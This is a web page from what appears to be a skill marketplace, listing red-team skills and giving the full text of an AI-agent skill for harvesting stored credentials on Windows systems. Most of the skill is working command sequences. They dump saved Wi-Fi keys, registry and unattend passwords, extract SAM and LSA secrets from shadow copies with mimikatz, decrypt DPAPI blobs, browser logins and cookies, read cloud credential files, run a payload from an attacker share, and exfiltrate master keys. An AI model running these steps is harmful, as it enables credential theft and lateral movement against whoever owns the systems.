원클릭으로
windows-credential-harvesting
Harvest stored credentials from a Windows system for privilege escalation or lateral movement.
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
Harvest stored credentials from a Windows system for privilege escalation or lateral movement.
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
Multi-phase penetration test orchestrator. Handles recon, assessment surface mapping, vulnerability chaining, and routes to technique skills for execution. Invoke via /red-run-ctf slash command only.
Exploits misconfigured Active Directory ACLs for privilege escalation. Covers GenericAll, GenericWrite, WriteDACL, WriteOwner, ForceChangePassword, targeted Kerberoasting via SPN manipulation, shadow credentials (msDS-KeyCredentialLink → PKINIT), and AdminSDHolder persistence.
Establishes persistence and exploits weak certificate mapping in AD CS. Covers ESC9 (no security extension), ESC10 (weak certificate mapping), ESC12-15 (YubiHSM, issuance policy, altSecIdentities, application policies), Golden Certificate (forge with stolen CA key), certificate theft (DPAPI/CAPI/CNG), and account persistence via certificate mapping.
Forces remote systems to authenticate back to attacker-controlled listeners and relays captured authentication to escalate privileges or move laterally. Covers authentication coercion (PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, CheeseOunce), NTLM relay (ntlmrelayx to LDAP/SMB/AD CS/MSSQL), Kerberos relay (krbrelayx, mitm6), and name resolution poisoning (LLMNR/NBNS/WPAD via Responder).
Extracts and cracks Kerberos service tickets (Kerberoasting) and AS-REP hashes (AS-REP Roasting) for offline password recovery.
Enumerates and exploits Microsoft SCCM/MECM (System Center Configuration Manager / Microsoft Endpoint Configuration Manager) infrastructure for credential harvesting, lateral movement, and domain escalation. Covers SCCM enumeration (sccmhunter, SharpSCCM), Network Access Account (NAA) credential extraction (policy request, WMI DPAPI, WMI repository), management point NTLM relay to MSSQL (TAKEOVER1), client push relay (ELEVATE2), PXE boot media credential harvesting (CRED1), SCCM database credential extraction, application deployment for lateral movement, and SCCM share looting.
| name | windows-credential-harvesting |
| description | Harvest stored credentials from a Windows system for privilege escalation or lateral movement. |
| keywords | ["credential harvesting","DPAPI","HiveNightmare","stored credentials","password hunting","credential vault","browser passwords","registry passwords","cmdkey","SharpDPAPI","unattend.xml"] |
| tools | ["SharpDPAPI","mimikatz","SharpChrome","SessionGopher","dpapi.py","secretsdump.py"] |
| opsec | low |
You are helping a penetration tester find and extract locally stored credentials on a Windows system. This covers file-based, registry-based, and DPAPI-protected secrets. All testing is under explicit written authorization.
Scope distinction: This skill covers LOCAL credential discovery — passwords in files, registry, vaults, browsers, DPAPI blobs, and shadow copies. For AD-level extraction (DCSync, NTDS.dit, LAPS, gMSA, DSRM), use credential-dumping instead.
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
[windows-credential-harvesting] Activated → <target> to the screen on activation.engagement/evidence/ with
descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).Call get_state_summary() from the state MCP server to read current
engagement state. Use it to:
Your return summary must include:
whoami)Start with techniques that work at any privilege level. These often yield immediate results with minimal detection.
cmdkey /list
If entries exist, use them:
runas /savecred /user:DOMAIN\admin cmd.exe
runas /savecred /user:administrator "\\ATTACKER\share\payload.exe"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultUserName DefaultDomainName DefaultPassword"
type %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
# Search all users (if readable)
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object {
Write-Host "`n=== $($_.FullName) ===" -ForegroundColor Yellow
Select-String -Path $_ -Pattern "passw|cred|secret|key|token|login" -Context 1,1
}
# Check common transcript locations
Get-ChildItem C:\Transcripts\ -Recurse -ErrorAction SilentlyContinue
Get-ChildItem C:\Users\*\Documents\PowerShell_transcript* -ErrorAction SilentlyContinue
dir /s /b C:\*unattend.xml C:\*sysprep.xml C:\*sysprep.inf 2>nul
type C:\Windows\Panther\Unattend.xml 2>nul | findstr /i "password"
type C:\Windows\Panther\Unattend\Unattend.xml 2>nul | findstr /i "password"
type C:\Windows\system32\sysprep\sysprep.xml 2>nul | findstr /i "password"
Passwords in unattend files are often base64-encoded:
echo "U2VjcmV0UGFzc3dvcmQxMjM=" | base64 -d
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U2VjcmV0UGFzc3dvcmQxMjM="))
reg query HKLM /F "password" /t REG_SZ /S /K 2>nul | findstr /i "password"
reg query HKCU /F "password" /t REG_SZ /S /K 2>nul | findstr /i "password"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
reg query "HKCU\Software\OpenSSH\Agent\Keys"
netsh wlan show profile
netsh wlan show profile <SSID> key=clear
One-liner to dump all WiFi passwords:
for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off >nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
Get-ChildItem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config 2>nul | findstr /i "connectionString password"
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt *.config 2>nul
dir /S /B *pass*.txt *pass*.xml *pass*.ini *cred* *vnc* *.config* 2>nul
findstr /spin "password" *.* 2>nul
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Extracts: PuTTY, WinSCP, SuperPuTTY, FileZilla, RDP saved sessions.
Check if the SAM hive is readable by non-admin users due to misconfigured ACLs.
icacls C:\Windows\System32\config\SAM
Vulnerable if output includes BUILTIN\Users:(I)(RX).
:: List available shadow copies
vssadmin list shadows
# Extract via mimikatz shadow copy access
mimikatz# misc::shadowcopies
mimikatz# lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
# Also extract SECURITY hive for LSA secrets
mimikatz# lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
Alternative — map shadow copy and extract offline:
mklink /d C:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
copy C:\shadowcopy\Windows\System32\config\SAM C:\Windows\Temp\SAM
copy C:\shadowcopy\Windows\System32\config\SYSTEM C:\Windows\Temp\SYSTEM
# Offline extraction (attacker machine)
secretsdump.py -sam SAM -system SYSTEM LOCAL
# Or: samdump2 SYSTEM SAM
# Or: pwdump SYSTEM SAM
Also check these paths for SAM/SYSTEM copies:
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\RegBack\system
DPAPI (Data Protection API) encrypts credentials, vault entries, browser passwords, and other secrets using keys derived from the user's password. Decrypting DPAPI requires either the user's password/NTLM hash, LSASS memory, or the domain backup key.
# Master keys
Get-ChildItem -Hidden C:\Users\*\AppData\Roaming\Microsoft\Protect\ -Recurse
Get-ChildItem -Hidden C:\Users\*\AppData\Local\Microsoft\Protect\ -Recurse
# Credential blobs
Get-ChildItem -Hidden C:\Users\*\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\*\AppData\Roaming\Microsoft\Credentials\
# Vault files
Get-ChildItem -Hidden C:\Users\*\AppData\Local\Microsoft\Vault\
Get-ChildItem -Hidden C:\Users\*\AppData\Roaming\Microsoft\Vault\
If running as the target user, DPAPI automatically uses the loaded master key:
# SharpDPAPI — decrypt everything accessible in current user context
SharpDPAPI.exe triage /unprotect
SharpDPAPI.exe credentials /unprotect
SharpDPAPI.exe vaults /unprotect
SharpDPAPI.exe rdg /unprotect
# Mimikatz — in-session decryption
mimikatz# dpapi::cred /in:C:\Users\user\AppData\Local\Microsoft\Credentials\<GUID> /unprotect
# SharpDPAPI — with password
SharpDPAPI.exe masterkeys /password:PASSWORD
SharpDPAPI.exe triage /password:PASSWORD
# SharpDPAPI — with NTLM hash
SharpDPAPI.exe masterkeys /ntlm:NTLM_HASH
# Mimikatz — decrypt master key with password
mimikatz# dpapi::masterkey /in:"C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}\{GUID}" /sid:S-1-5-21-...-1107 /password:PASSWORD /protected
# Then use the master key to decrypt blobs
mimikatz# dpapi::cred /in:C:\path\to\credential /masterkey:MASTERKEY_HEX
# Impacket dpapi.py (offline)
python3 dpapi.py masterkey -file {GUID} -sid S-1-5-21-...-1107 -password 'Password!'
python3 dpapi.py credential -file CREDENTIAL_BLOB -key 0xMASTERKEY_HEX
If the user is currently logged in on a domain-joined machine:
# SharpDPAPI — RPC call to DC for master key decryption
SharpDPAPI.exe masterkeys /rpc
SharpDPAPI.exe triage /rpc
# Mimikatz
mimikatz# dpapi::masterkey /in:"C:\...\{GUID}" /rpc
With domain admin access, extract the DPAPI backup key to decrypt any user's master keys:
# Extract domain backup key
SharpDPAPI.exe backupkey /server:DC01.domain.local /file:key.pvk
# Mimikatz
mimikatz# lsadump::backupkeys /system:DC01.domain.local /export
# Then decrypt any user's credentials with the backup key
SharpDPAPI.exe triage /pvk:key.pvk
SharpDPAPI.exe credentials /server:TARGET /pvk:key.pvk
# Extract DPAPI keys from LSASS
mimikatz# sekurlsa::dpapi
# Use the prekey from LSASS dump
SharpDPAPI.exe triage /prekey:SHA1_HEX
For machine-scoped DPAPI (e.g., scheduled task credentials, service account creds):
# Extract machine DPAPI key from LSA secrets
reg save HKLM\SYSTEM C:\Windows\Temp\system.hiv
reg save HKLM\SECURITY C:\Windows\Temp\security.hiv
# Offline extraction
mimikatz# lsadump::secrets /system:system.hiv /security:security.hiv
If you have master key files but not the password, extract the hash for offline cracking:
# Extract hashcat-format hashes from master keys
DPAPISnoop.exe masterkey-parse C:\Users\bob\AppData\Roaming\Microsoft\Protect\{SID} --mode hashcat --outfile engagement/evidence/dpapi-masterkey-bob.hc
Do NOT crack hashes in this skill. Save the DPAPI master key hash to
engagement/evidence/ and return to the orchestrator with the hash file path,
hash type (DPAPI masterkey / hashcat mode 15900), and a routing recommendation
to credential-recovery.
# SharpChrome — interactive (current user session)
SharpChrome.exe logins /browser:chrome /unprotect
SharpChrome.exe logins /browser:edge /unprotect
SharpChrome.exe cookies /browser:chrome /format:csv /unprotect
# Offline workflow — extract state key, then decrypt
SharpChrome.exe statekeys /target:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Local State" /unprotect
# Use the hex statekey output to decrypt cookies offline
SharpChrome.exe cookies /target:"C:\Users\bob\...\Default\Cookies" /statekey:STATEKEY_HEX /format:json
# Remote with domain backup key
SharpChrome.exe logins /server:HOST01 /browser:chrome /pvk:key.pvk
SharpChrome.exe cookies /server:HOST01 /browser:edge /pvk:BASE64
# With DPAPI prekey from LSASS dump
SharpChrome.exe logins /browser:edge /prekey:SHA1_HEX
Chrome/Edge file locations:
C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\<USER>\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
C:\Users\<USER>\AppData\Roaming\Mozilla\Firefox\Profiles\<PROFILE>\key4.db
C:\Users\<USER>\AppData\Roaming\Mozilla\Firefox\Profiles\<PROFILE>\logins.json
Tools: SharpWeb, firefox_decrypt.py, firepwd.py.
mimikatz# dpapi::chrome /in:"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /unprotect
:: List vault entries
vaultcmd /listcreds:"Windows Credentials" /all
vaultcmd /listcreds:"Web Credentials" /all
# Mimikatz vault dumping
mimikatz# vault::list
mimikatz# vault::cred /patch
# SQLite database — may contain passwords in notes
$db = "C:\Users\$env:USERNAME\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite"
if (Test-Path $db) { Write-Host "Sticky Notes DB found: $db" }
Copy and open with any SQLite viewer — notes stored in plaintext.
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\RealVNC\WinVNC4" /v password
VNC passwords are DES-encrypted with a fixed key — trivially decryptable.
dir /s /b "C:\ProgramData\McAfee\*SiteList*" 2>nul
dir /s /b "C:\Program Files\McAfee\*SiteList*" 2>nul
May contain encrypted repository credentials.
# AWS
Test-Path "$env:USERPROFILE\.aws\credentials"
type "$env:USERPROFILE\.aws\credentials" 2>nul
# Azure
Test-Path "$env:USERPROFILE\.azure"
dir "$env:USERPROFILE\.azure" 2>nul
# GCP
Test-Path "$env:APPDATA\gcloud\credentials.db"
# Kubernetes
Test-Path "$env:USERPROFILE\.kube\config"
type "$env:USERPROFILE\.kube\config" 2>nul | findstr /i "password token"
# Check for hidden data streams
Get-Item -Path C:\Users\*\Desktop\* -Stream * -ErrorAction SilentlyContinue | Where-Object { $_.Stream -ne ':$DATA' }
# Read a specific stream
Get-Content -Path file.txt -Stream HiddenStream
STOP and return to the orchestrator with:
The master key is protected by the user's password. You need either: (1) the user's plaintext password or NTLM hash, (2) access to LSASS memory (local admin), (3) the domain backup key (domain admin), or (4) to run as the target user (in-session).
The vulnerability requires existing volume shadow copies. Check with
vssadmin list shadows. If none exist, this path is not exploitable without creating
one (requires admin).
Copy the file to a temp location before reading:
copy "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" C:\Windows\Temp\LoginData
Exfiltrate the master key files and credential blobs to the attacker machine.
Use DPAPISnoop to generate hashcat-format hashes (mode 15900), save to
engagement/evidence/, and route to credential-recovery.
Without admin access, you can only harvest credentials from the current user's profile. Escalate first via windows-uac-bypass or windows-token-impersonation, then re-run harvesting.